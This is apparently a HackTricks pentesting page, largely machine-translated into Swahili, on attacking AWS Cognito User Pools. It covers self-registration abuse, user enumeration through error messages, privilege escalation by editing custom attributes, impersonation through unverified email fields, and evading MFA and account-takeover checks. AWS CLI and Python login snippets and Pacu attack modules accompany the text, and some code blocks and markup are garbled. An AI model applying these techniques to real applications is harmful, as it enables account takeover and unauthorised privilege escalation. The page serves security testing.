Cognito User Pools

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

Maktaba ya mtumiaji ni directory ya watumiaji katika Amazon Cognito. Kwa maktaba ya mtumiaji, watumiaji wako wanaweza kuingia kwenye programu yako ya wavuti au simu kupitia Amazon Cognito, au kuunganishwa kupitia mtoa huduma wa utambulisho wa third-party (IdP). Iwe watumiaji wako wanaingia moja kwa moja au kupitia upande wa tatu, wanachama wote wa maktaba ya mtumiaji wana wasifu wa directory ambao unaweza kufikia kupitia SDK.

Maktaba za watumiaji zinatoa:

Huduma za kujiandikisha na kuingia.
UI ya wavuti iliyojengwa ndani, inayoweza kubadilishwa ili kuingia watumiaji.
Kuingia kwa kijamii na Facebook, Google, Login with Amazon, na Sign in with Apple, na kupitia mtoa huduma wa utambulisho wa SAML na OIDC kutoka kwa maktaba yako ya watumiaji.
Usimamizi wa directory ya watumiaji na wasifu wa watumiaji.
Vipengele vya usalama kama uthibitisho wa hatua nyingi (MFA), ukaguzi wa akidi zilizovunjika, ulinzi wa kuchukua akaunti, na uthibitisho wa simu na barua pepe.
Mifumo iliyobadilishwa na uhamaji wa watumiaji kupitia AWS Lambda triggers.

Source code ya programu kawaida pia itakuwa na user pool ID na client application ID, (na wakati mwingine application secret?) ambazo zinahitajika kwa mtumiaji kuingia kwenye Maktaba ya Mtumiaji ya Cognito.

Potential attacks

Usajili: Kwa default mtumiaji anaweza kujiandikisha mwenyewe, hivyo anaweza kuunda mtumiaji kwa ajili yake mwenyewe.
Uainishaji wa watumiaji: Kazi ya usajili inaweza kutumika kupata majina ya watumiaji ambayo tayari yapo. Taarifa hii inaweza kuwa muhimu kwa shambulio la brute-force.
Login brute-force: Katika sehemu ya Authentication una mbinu zote ambazo mtumiaji anapaswa kuingia, unaweza kujaribu kujaribu nguvu kupata akidi halali.

Tools for pentesting

Pacu, sasa inajumuisha moduli za cognito__enum na cognito__attack ambazo zinafanya otomatiki uainishaji wa mali zote za Cognito katika akaunti na kuashiria mipangilio dhaifu, sifa za mtumiaji zinazotumika kwa udhibiti wa ufikiaji, nk, na pia zinafanya otomatiki uundaji wa watumiaji (ikiwemo msaada wa MFA) na kupandisha hadhi kulingana na sifa za kawaida zinazoweza kubadilishwa, akidi zinazoweza kutumika za identity pool, majukumu yanayoweza kuchukuliwa katika tokens za id, nk. Kwa maelezo ya kazi za moduli angalia sehemu ya 2 ya blog post. Kwa maelekezo ya usakinishaji angalia ukurasa mkuu wa Pacu.

# Run cognito__enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account
Pacu (new:test) > run cognito__enum

# cognito__attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client:
Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX

Cognito Scanner ni chombo cha CLI katika python ambacho kinatekeleza mashambulizi tofauti kwenye Cognito ikiwa ni pamoja na uundaji wa akaunti zisizohitajika na oracle ya akaunti. Angalia hii kiungo kwa maelezo zaidi.

# Install
pip install cognito-scanner
# Run
cognito-scanner --help

CognitoAttributeEnum: Hii skripti inaruhusu kuhesabu sifa halali za watumiaji.

python cognito-attribute-enu.py -client_id 16f1g98bfuj9i0g3f8be36kkrl

Usajili

User Pools inaruhusu kwa default kujiandikisha watumiaji wapya.

aws cognito-idp sign-up --client-id <client-id> \
--username <username> --password <password> \
--region <region> --no-sign-request

Ikiwa mtu yeyote anaweza kujiandikisha

Unaweza kupata kosa linaloonyesha kuwa unahitaji kutoa maelezo zaidi kuhusu mtumiaji:

An error occurred (InvalidParameterException) when calling the SignUp operation: Attributes did not conform to the schema: address: The attribute is required

Unaweza kutoa maelezo yanayohitajika kwa JSON kama:

--user-attributes '[{"Name": "email", "Value": "carlospolop@gmail.com"}, {"Name":"gender", "Value": "M"}, {"Name": "address", "Value": "street"}, {"Name": "custom:custom_name", "Value":"supername&\"*$"}]'

Unaweza kutumia hii kazi pia kuhesabu watumiaji waliopo. Hii ndiyo ujumbe wa kosa wakati mtumiaji tayari yupo na jina hilo:

An error occurred (UsernameExistsException) when calling the SignUp operation: User already exists

Kumbuka katika amri iliyopita jinsi sifa za kawaida zinavyoanza na "custom:". Pia fahamu kwamba unapojisajili huwezi kuunda sifa mpya za kawaida kwa mtumiaji. Unaweza tu kutoa thamani kwa sifa za kawaida (hata kama hazihitajiki) na sifa za kawaida zilizotajwa.

Au tu kujaribu kama kitambulisho cha mteja kinapatikana. Hii ndiyo hitilafu ikiwa kitambulisho cha mteja hakipo:

An error occurred (ResourceNotFoundException) when calling the SignUp operation: User pool client 3ig612gjm56p1ljls1prq2miut does not exist.

Ikiwa tu admin anaweza kujiandikisha watumiaji

Utapata kosa hili na huwezi kujiandikisha au kuhesabu watumiaji:

An error occurred (NotAuthorizedException) when calling the SignUp operation: SignUp is not permitted for this user pool

Verifying Registration

Cognito inaruhusu kuhakiki mtumiaji mpya kwa kuangalia barua pepe yake au nambari ya simu. Hivyo, unapounda mtumiaji kwa kawaida utahitajika angalau jina la mtumiaji na nenosiri na barua pepe na/au nambari ya simu. Weka moja unayoimiliki ili upokee msimbo wa kuhakiki akaunti yako mpya ya mtumiaji iliyoundwa kama hii:

aws cognito-idp confirm-sign-up --client-id <cliet_id> \
--username aasdasd2 --confirmation-code <conf_code> \
--no-sign-request --region us-east-1

Hata hivyo inaonekana kama unaweza kutumia barua pepe hiyo hiyo na nambari ya simu, unapohitaji kuthibitisha mtumiaji aliyeundwa Cognito italamika kuhusu kutumia taarifa hizo hizo na haitakuruhusu kuthibitisha akaunti.

Kuinua Mamlaka / Kusasisha Sifa

Kwa default mtumiaji anaweza kubadilisha thamani ya sifa zake kwa kitu kama:

aws cognito-idp update-user-attributes \
--region us-east-1 --no-sign-request \
--user-attributes Name=address,Value=street \
--access-token <access token>

Uhamasishaji wa haki za sifa za kawaida

Unaweza kupata sifa za kawaida zikitumika (kama isAdmin), kwani kwa kawaida unaweza kubadilisha thamani za sifa zako unaweza kuwa na uwezo wa kuongeza haki kwa kubadilisha thamani mwenyewe!

Uhamasishaji wa mabadiliko ya barua pepe/jina la mtumiaji

Unaweza kutumia hii kubadilisha barua pepe na nambari ya simu ya mtumiaji, lakini kisha, hata kama akaunti inabaki kuwa imethibitishwa, sifa hizo zimewekwa katika hali isiyothibitishwa (unahitaji kuzithibitisha tena).

Hutaweza kuingia kwa kutumia barua pepe au nambari ya simu hadi uzithibitisha, lakini utaweza kuingia kwa kutumia jina la mtumiaji. Kumbuka kwamba hata kama barua pepe ilibadilishwa na haijathibitishwa itaonekana katika Token ya ID ndani ya email field na uwanja email_verified utakuwa false, lakini ikiwa programu haiangalii hiyo unaweza kujifanya kuwa watumiaji wengine.

Zaidi ya hayo, kumbuka kwamba unaweza kuweka chochote ndani ya name field kwa kubadilisha sifa ya jina. Ikiwa programu inakagua hiyo field kwa sababu fulani badala ya email (au sifa nyingine yoyote) unaweza kuwa na uwezo wa kujifanya kuwa watumiaji wengine.

Hata hivyo, ikiwa kwa sababu fulani umebadilisha barua pepe yako kwa mfano kuwa mpya unayoweza kufikia unaweza kuthibitisha barua pepe hiyo kwa kutumia nambari uliyopokea katika anwani hiyo ya barua pepe:

aws cognito-idp verify-user-attribute \
--access-token <access_token> \
--attribute-name email --code <code> \
--region <region> --no-sign-request

Tumia phone_number badala ya email kubadilisha/thibitisha nambari mpya ya simu.

Msimamizi pia anaweza kuwezesha chaguo la kuingia kwa kutumia jina la mtumiaji linalopendekezwa na mtumiaji. Kumbuka kwamba huwezi kubadilisha thamani hii kuwa jina lolote la mtumiaji au preferred_username ambalo tayari linatumika kuiga mtumiaji tofauti.

Rejesha/Badilisha Nenosiri

Inawezekana kurejesha nenosiri kwa kujua tu jina la mtumiaji (au email au simu inakubaliwa) na kuwa na ufaccess kwa sababu nambari itatumwa huko:

aws cognito-idp forgot-password \
--client-id <client_id> \
--username <username/email/phone> --region <region>

Majibu ya seva daima yatakuwa chanya, kama vile jina la mtumiaji lilipo. Huwezi kutumia njia hii kuhesabu watumiaji.

Kwa msimbo unaweza kubadilisha nenosiri kwa:

aws cognito-idp confirm-forgot-password \
--client-id <client_id> \
--username <username> \
--confirmation-code <conf_code> \
--password <pwd> --region <region>

Ili kubadilisha nenosiri unahitaji kujua nenosiri la awali:

aws cognito-idp change-password \
--previous-password <value> \
--proposed-password <value> \
--access-token <value>

Authentication

Mkusanyiko wa watumiaji unasaidia njia tofauti za kuthibitisha kwake. Ikiwa una jina la mtumiaji na nenosiri kuna pia mbinu tofauti zinazosaidiwa kuingia. Zaidi ya hayo, wakati mtumiaji anathibitishwa katika Mkusanyiko aina 3 za tokeni hutolewa: ID Token, Access token na Refresh token.

ID Token: Inabeba madai kuhusu utambulisho wa mtumiaji aliyethibitishwa, kama vile jina, barua pepe, na nambari ya simu. ID token inaweza pia kutumika kuhuthibitisha watumiaji kwenye seva zako za rasilimali au programu za seva. Lazima uthibitishe sahihi ya ID token kabla ya kuweza kuamini madai yoyote ndani ya ID token ikiwa unaitumia katika programu za nje.
ID Token ndiyo tokeni ambayo ina thamani za sifa za mtumiaji, hata zile za kawaida.
Access Token: Inabeba madai kuhusu mtumiaji aliyethibitishwa, orodha ya makundi ya mtumiaji, na orodha ya mipaka. Lengo la access token ni kuidhinisha operesheni za API katika muktadha wa mtumiaji katika mkusanyiko wa watumiaji. Kwa mfano, unaweza kutumia access token kumpatia mtumiaji wako ufikiaji wa kuongeza, kubadilisha, au kufuta sifa za mtumiaji.
Refresh Token: Kwa kutumia refresh tokens unaweza kupata ID Tokens na Access Tokens mpya kwa mtumiaji hadi refresh token iwe batili. Kwa kawaida, refresh token inaisha siku 30 baada ya mtumiaji wa programu yako kuingia kwenye mkusanyiko wako wa watumiaji. Unapounda programu kwa ajili ya mkusanyiko wako wa watumiaji, unaweza kuweka muda wa kumalizika wa refresh token wa programu kuwa thamani yoyote kati ya dakika 60 na miaka 10.

ADMIN_NO_SRP_AUTH & ADMIN_USER_PASSWORD_AUTH

Hii ni mchakato wa uthibitishaji upande wa seva:

Programu ya upande wa seva inaita AdminInitiateAuth API operation (badala ya InitiateAuth). Operesheni hii inahitaji akreditif za AWS zenye ruhusa zinazojumuisha cognito-idp:AdminInitiateAuth na cognito-idp:AdminRespondToAuthChallenge. Operesheni inarudisha vigezo vya uthibitishaji vinavyohitajika.
Baada ya programu ya upande wa seva kuwa na vigezo vya uthibitishaji, inaita AdminRespondToAuthChallenge API operation. Operesheni ya AdminRespondToAuthChallenge inafanikiwa tu unapotoa akreditif za AWS.

Hii mbinu HAIRUHUSIWI kwa kawaida.

Ili kuingia unahitaji kujua:

kitambulisho cha mkusanyiko wa watumiaji
kitambulisho cha mteja
jina la mtumiaji
nenosiri
siri ya mteja (tu ikiwa programu imewekwa ili kutumia siri)

Ili uweze kuingia kwa kutumia mbinu hii programu hiyo lazima iruhusu kuingia kwa ALLOW_ADMIN_USER_PASSWORD_AUTH. Zaidi ya hayo, ili kufanya kitendo hiki unahitaji akreditif zenye ruhusa cognito-idp:AdminInitiateAuth na cognito-idp:AdminRespondToAuthChallenge

aws cognito-idp admin-initiate-auth \
--client-id <client-id> \
--auth-flow ADMIN_USER_PASSWORD_AUTH \
--region <region> \
--auth-parameters 'USERNAME=<username>,PASSWORD=<password>,SECRET_HASH=<hash_if_needed>'
--user-pool-id "<pool-id>"

# Check the python code to learn how to generate the hsecret_hash

Kanuni ya Kuingia

```python import boto3 import botocore import hmac import hashlib import base64

client_id = "" user_pool_id = "" client_secret = "" username = "" password = ""

boto_client = boto3.client('cognito-idp', region_name='us-east-1')

def get_secret_hash(username, client_id, client_secret): key = bytes(client_secret, 'utf-8') message = bytes(f'{username}{client_id}', 'utf-8') return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode()

If the Client App isn't configured to use a secret

just delete the line setting the SECRET_HASH

def login_user(username_or_alias, password, client_id, client_secret, user_pool_id): try: return boto_client.admin_initiate_auth( UserPoolId=user_pool_id, ClientId=client_id, AuthFlow='ADMIN_USER_PASSWORD_AUTH', AuthParameters={ 'USERNAME': username_or_alias, 'PASSWORD': password, 'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret) } ) except botocore.exceptions.ClientError as e: return e.response

print(login_user(username, password, client_id, client_secret, user_pool_id))

</details>

### USER\_PASSWORD\_AUTH

Njia hii ni mchakato mwingine rahisi wa **uthibitishaji wa mtumiaji na nenosiri** wa **kijadi**. Inapendekezwa **kuhamasisha njia ya** uthibitishaji wa **kijadi** **kwenda kwa Cognito** na **inapendekezwa** kisha **kuzimwa** na **kutumia** njia ya **ALLOW\_USER\_SRP\_AUTH** badala yake (kwa sababu hiyo haitumii nenosiri kwenye mtandao).\
Njia hii **HAIJAWEKWA** kuwa hai kwa chaguo-msingi.

Tofauti kuu na **njia ya uthibitishaji** ya **awali** ndani ya msimbo ni kwamba **huhitaji kujua ID ya kundi la watumiaji** na kwamba **huhitaji ruhusa za ziada** katika Kundi la Watumiaji la Cognito.

Ili **kuingia** unahitaji kujua:

* kitambulisho cha mteja
* jina la mtumiaji
* nenosiri
* siri ya mteja (tu ikiwa programu imewekwa ili kutumia siri)

<div data-gb-custom-block data-tag="hint" data-style='info'>

Ili uweze **kuingia kwa njia hii** programu hiyo lazima iruhusu kuingia kwa ALLOW\_USER\_PASSWORD\_AUTH.

</div>

```python
aws cognito-idp initiate-auth  --client-id <client-id> \
--auth-flow USER_PASSWORD_AUTH --region <region> \
--auth-parameters 'USERNAME=<username>,PASSWORD=<password>,SECRET_HASH=<hash_if_needed>'

# Check the python code to learn how to generate the secret_hash

```python import boto3 import botocore import hmac import hashlib import base64

client_id = "" user_pool_id = "" client_secret = "" username = "" password = ""

boto_client = boto3.client('cognito-idp', region_name='us-east-1')

If the Client App isn't configured to use a secret

just delete the line setting the SECRET_HASH

def login_user(username_or_alias, password, client_id, client_secret, user_pool_id): try: return boto_client.initiate_auth( ClientId=client_id, AuthFlow='ADMIN_USER_PASSWORD_AUTH', AuthParameters={ 'USERNAME': username_or_alias, 'PASSWORD': password, 'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret) } ) except botocore.exceptions.ClientError as e: return e.response

print(login_user(username, password, client_id, client_secret, user_pool_id))

</details>

### USER\_SRP\_AUTH

Hii ni hali inayofanana na ile ya awali lakini **badala ya kutuma nenosiri** kupitia mtandao kuingia **uthibitishaji wa changamoto unafanywa** (hivyo hakuna nenosiri linalopita hata kama limeandikwa kwa siri kupitia mtandao).\
Hii **mbinu imewezeshwa** kwa default.

Ili **kuingia** unahitaji kujua:

* kitambulisho cha kundi la watumiaji
* kitambulisho cha mteja
* jina la mtumiaji
* nenosiri
* siri ya mteja (tu ikiwa programu imewekwa ili kutumia siri)

<details>

<summary>Code to login</summary>
```python
from warrant.aws_srp import AWSSRP
import os

USERNAME='xxx'
PASSWORD='yyy'
POOL_ID='us-east-1_zzzzz'
CLIENT_ID = '12xxxxxxxxxxxxxxxxxxxxxxx'
CLIENT_SECRET = 'secreeeeet'
os.environ["AWS_DEFAULT_REGION"] = "<region>"

aws = AWSSRP(username=USERNAME, password=PASSWORD, pool_id=POOL_ID,
client_id=CLIENT_ID, client_secret=CLIENT_SECRET)
tokens = aws.authenticate_user()
id_token = tokens['AuthenticationResult']['IdToken']
refresh_token = tokens['AuthenticationResult']['RefreshToken']
access_token = tokens['AuthenticationResult']['AccessToken']
token_type = tokens['AuthenticationResult']['TokenType']

REFRESH_TOKEN_AUTH & REFRESH_TOKEN

Hii mbinu daima itakuwa halali (haiwezi kuzuiwa) lakini unahitaji kuwa na tokeni halali ya refresha.

aws cognito-idp initiate-auth \
--client-id 3ig6h5gjm56p1ljls1prq2miut \
--auth-flow REFRESH_TOKEN_AUTH \
--region us-east-1 \
--auth-parameters 'REFRESH_TOKEN=<token>'

Kanuni ya kufufua

```python import boto3 import botocore import hmac import hashlib import base64

client_id = "" token = ''

boto_client = boto3.client('cognito-idp', region_name='')

def refresh(client_id, refresh_token): try: return boto_client.initiate_auth( ClientId=client_id, AuthFlow='REFRESH_TOKEN_AUTH', AuthParameters={ 'REFRESH_TOKEN': refresh_token } ) except botocore.exceptions.ClientError as e: return e.response

print(refresh(client_id, token))

</details>

### CUSTOM\_AUTH

Katika kesi hii, **uthibitishaji** utafanywa kupitia **utendaji wa kazi ya lambda**.

## Usalama wa Ziada

### Usalama wa Juu

Kwa kawaida umezimwa, lakini ikiwa umewezeshwa, Cognito inaweza kuwa na uwezo wa **kupata uhamasishaji wa akaunti**. Ili kupunguza uwezekano, unapaswa kuingia kutoka kwenye **mtandao ndani ya jiji moja, ukitumia wakala yule yule wa mtumiaji** (na IP ikiwa inawezekana)**.**

### **MFA Kumbuka kifaa**

Ikiwa mtumiaji anaingia kutoka kwenye kifaa kilekile, MFA inaweza kupuuziliwa mbali, hivyo jaribu kuingia kutoka kwenye kivinjari kilekile na metadata ile ile (IP?) ili kujaribu kupuuzilia mbali ulinzi wa MFA.

## Vikundi vya User Pool IAM Roles

Inawezekana kuongeza **watumiaji kwenye vikundi vya User Pool** vinavyohusiana na **IAM roles** moja.\
Zaidi ya hayo, **watumiaji** wanaweza kupewa **vikundi zaidi ya 1 vyenye IAM roles tofauti** vilivyounganishwa.

Kumbuka kwamba hata kama kundi liko ndani ya kundi lenye IAM role iliyounganishwa, ili kuweza kupata akreditif za IAM za kundi hilo inahitajika kwamba **User Pool itumike na Identity Pool** (na kujua maelezo ya Identity Pool hiyo).

Sharti lingine ili kupata **IAM role iliyoonyeshwa katika IdToken** wakati mtumiaji anathibitishwa katika User Pool (`aws cognito-idp initiate-auth...`) ni kwamba **Mtoa Huduma wa Uthibitishaji wa Kitambulisho** anahitaji kuonyesha kwamba **role inapaswa kuchaguliwa kutoka kwenye token.**

<figure><img src="../../../../.gitbook/assets/image (250).png" alt=""><figcaption></figcaption></figure>

**Roles** ambazo mtumiaji anaweza kufikia ziko **ndani ya `IdToken`**, na mtumiaji anaweza **kuchagua ni role ipi anataka akreditif zake** kwa kutumia **`--custom-role-arn`** kutoka `aws cognito-identity get-credentials-for-identity`.\
Hata hivyo, ikiwa **chaguo la kawaida** ndilo **limewekwa** (`tumia role ya kawaida`), na unajaribu kufikia role kutoka kwenye IdToken, utapata **kosa** (ndiyo maana usanidi wa awali unahitajika):

<div data-gb-custom-block data-tag="code" data-overflow='wrap'>

An error occurred (InvalidParameterException) when calling the GetCredentialsForIdentity operation: Only SAML providers and providers with RoleMappings support custom role ARN.


</div>

<div data-gb-custom-block data-tag="hint" data-style='warning'>

Kumbuka kwamba jukumu lililotolewa kwa **User Pool Group** linahitaji kuwa **linapatikana na Mtoa Kitambulisho** ambaye **anatumaini User Pool** (kama **akili za kikao za IAM** zitapatikana kutoka kwake).

</div>

```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "cognito-identity.amazonaws.com"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"cognito-identity.amazonaws.com:aud": "us-east-1:2361092e-9db6-a876-1027-10387c9de439"
},
"ForAnyValue:StringLike": {
"cognito-identity.amazonaws.com:amr": "authenticated"
}
}
}
]
}js

PreviousCognito Identity Pools NextAWS - DataPipeline, CodePipeline & CodeCommit Enum

Last updated 3 days ago